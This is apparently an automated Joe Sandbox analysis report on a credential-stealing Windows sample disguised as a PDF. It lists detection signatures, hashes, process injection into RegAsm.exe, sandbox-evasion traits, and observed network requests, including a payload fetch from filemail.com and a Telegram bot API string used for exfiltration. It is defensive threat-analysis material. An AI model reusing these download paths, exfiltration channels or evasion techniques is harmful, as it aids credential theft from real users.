Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AWB_3570456515#U00b7PDF.scr.exe

Overview

General Information

Sample name:AWB_3570456515#U00b7PDF.scr.exe
renamed because original name is a hash value
Original sample name:AWB_3570456515PDF.scr.exe
Analysis ID:1620753
MD5:5b95c93a80d1aadfc50c8f1cd4983f50
SHA1:839ed03bd96764233e30d53e46213381661176f6
SHA256:c81350a2c2132b610fb4198970fafa7b8a3a3897a9555421e1d0842e959fd3cc
Tags:exeuser-julianmckein
Infos:

Detection

MSIL Logger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • AWB_3570456515#U00b7PDF.scr.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exe" MD5: 5B95C93A80D1AADFC50C8F1CD4983F50)
    • RegAsm.exe (PID: 7832 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.3290043336.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
    00000000.00000002.2581612167.0000000005F70000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.2573429947.000000000349F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        00000004.00000002.3291814644.00000000026EA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 10 entries
            SourceRuleDescriptionAuthorStrings
            0.2.AWB_3570456515#U00b7PDF.scr.exe.3bc0458.7.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.raw.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                0.2.AWB_3570456515#U00b7PDF.scr.exe.34c2698.0.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                  4.2.RegAsm.exe.400000.0.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                    0.2.AWB_3570456515#U00b7PDF.scr.exe.5f70000.14.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 5 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-02-21T08:58:23.445598+010028032742Potentially Bad Traffic192.168.2.549929158.101.44.24280TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: AWB_3570456515#U00b7PDF.scr.exeAvira: detected
                      Source: AWB_3570456515#U00b7PDF.scr.exeReversingLabs: Detection: 39%
                      Source: AWB_3570456515#U00b7PDF.scr.exeVirustotal: Detection: 47%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                      Location Tracking

                      barindex
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: AWB_3570456515#U00b7PDF.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49935 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 23.237.188.42:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: AWB_3570456515#U00b7PDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003429000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2578976279.0000000005720000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003429000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2578976279.0000000005720000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 4x nop then jmp 060CCBAFh0_2_060CCB50
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 4x nop then jmp 060CD4AEh0_2_060CD2C0
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 4x nop then jmp 060CD4AEh0_2_060CD2D0
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 4x nop then jmp 060CCBAFh0_2_060CCB40
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 4x nop then jmp 06103D48h0_2_06103CE4
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 4x nop then jmp 06103D48h0_2_061039B0
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 4x nop then jmp 06103D48h0_2_061039C0
                      Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wLJXv0M&pk_vid=8e2aec8f065dac991740056616c1eb95 HTTP/1.1Host: 1009.filemail.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wLJXv0M&pk_vid=8e2aec8f065dac991740056616c1eb95 HTTP/1.1Host: 1009.filemail.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                      Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                      Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49929 -> 158.101.44.242:80
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49935 version: TLS 1.0
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wLJXv0M&pk_vid=8e2aec8f065dac991740056616c1eb95 HTTP/1.1Host: 1009.filemail.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wLJXv0M&pk_vid=8e2aec8f065dac991740056616c1eb95 HTTP/1.1Host: 1009.filemail.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: 1009.filemail.com
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.00000000023D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1009.filemail.com
                      Source: AWB_3570456515#U00b7PDF.scr.exeString found in binary or memory: http://1009.filemail.com/api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0wL
                      Source: RegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                      Source: RegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                      Source: RegAsm.exe, 00000004.00000002.3291814644.00000000025EC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: RegAsm.exe, 00000004.00000002.3291814644.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: RegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                      Source: RegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                      Source: RegAsm.exe, 00000004.00000002.3291814644.000000000261E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                      Source: RegAsm.exe, 00000004.00000002.3291814644.000000000261E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3291814644.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.00000000023FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1009.filemail.com
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.000000000242D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1009.filemail.com/api/file/get?filekey=nW2Ap4Pfz5pJQqfRbPLEWxth-EC7D4z7AJnkRgiFaLtKQyjxr1j0w
                      Source: RegAsm.exe, 00000004.00000002.3291814644.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: RegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                      Source: RegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3291814644.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: RegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                      Source: RegAsm.exe, 00000004.00000002.3291814644.00000000025FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2559006927.000000000242D000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2582020395.0000000006070000.00000004.08000000.00040000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003CAA000.00000004.00000800.00020000.00000000.sdmp, AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                      Source: unknownHTTPS traffic detected: 23.237.188.42:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05793A18 NtResumeThread,0_2_05793A18
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05793A10 NtResumeThread,0_2_05793A10
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_00A62A900_2_00A62A90
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_00A630190_2_00A63019
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_00A62A6F0_2_00A62A6F
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_00A63A450_2_00A63A45
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E3D5B80_2_05E3D5B8
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E375590_2_05E37559
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E3F7880_2_05E3F788
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E38ECB0_2_05E38ECB
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E351300_2_05E35130
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E3D5A70_2_05E3D5A7
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E319A00_2_05E319A0
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E319900_2_05E31990
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E319610_2_05E31961
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E351230_2_05E35123
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E52F280_2_05E52F28
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E66F510_2_05E66F51
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E66F580_2_05E66F58
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E6E6C80_2_05E6E6C8
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E676190_2_05E67619
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05E60A100_2_05E60A10
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05F669680_2_05F66968
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05F6B3EE0_2_05F6B3EE
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05F61AB00_2_05F61AB0
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05F61C000_2_05F61C00
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05F616500_2_05F61650
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05F649E80_2_05F649E8
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05F669610_2_05F66961
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05F669580_2_05F66958
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05F61BF70_2_05F61BF7
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05F61B680_2_05F61B68
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05F61AA90_2_05F61AA9
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_05F6B2480_2_05F6B248
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_060673D00_2_060673D0
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_0606DC000_2_0606DC00
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06065C5F0_2_06065C5F
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06065ADD0_2_06065ADD
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06069B010_2_06069B01
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_0606A7690_2_0606A769
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_0606A7780_2_0606A778
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_060673C70_2_060673C7
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_060600060_2_06060006
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_060600400_2_06060040
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06065EDD0_2_06065EDD
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06065C280_2_06065C28
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06065A2B0_2_06065A2B
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06065A300_2_06065A30
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06065B170_2_06065B17
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06065B7F0_2_06065B7F
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_06065BC30_2_06065BC3
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_060CEDB00_2_060CEDB0
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_060C98980_2_060C9898
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_061021480_2_06102148
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_061015770_2_06101577
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_0610A2A80_2_0610A2A8
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_0610213A0_2_0610213A
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_0633FB600_2_0633FB60
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_063200060_2_06320006
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_063200400_2_06320040
                      Source: C:\Users\user\Desktop\AWB_3570456515#U00b7PDF.scr.exeCode function: 0_2_0633E1900_2_0633E190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_006E30CA4_2_006E30CA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_006ED4684_2_006ED468
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_006E3D284_2_006E3D28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_006E41A04_2_006E41A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_006E3A604_2_006E3A60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_006E3A704_2_006E3A70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_006E93884_2_006E9388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_006E3D184_2_006E3D18
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_006EBE884_2_006EBE88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0595C9B84_2_0595C9B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_059509C44_2_059509C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_059571424_2_05957142
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_059508C04_2_059508C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_059500404_2_05950040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05950B984_2_05950B98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05950F1C4_2_05950F1C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_059543004_2_05954300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05950C0D4_2_05950C0D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05956F484_2_05956F48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_059512A34_2_059512A3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_059562104_2_05956210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_05950A484_2_05950A48
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003568000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameZpwbggi.dll" vs AWB_3570456515#U00b7PDF.scr.exe
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2557210225.000000000053E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs AWB_3570456515#U00b7PDF.scr.exe
                      Source: AWB_3570456515#U00b7PDF.scr.exe, 00000000.00000002.2573429947.0000000003429000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs AWB_3570456515#U00b7PDF.scr.exe
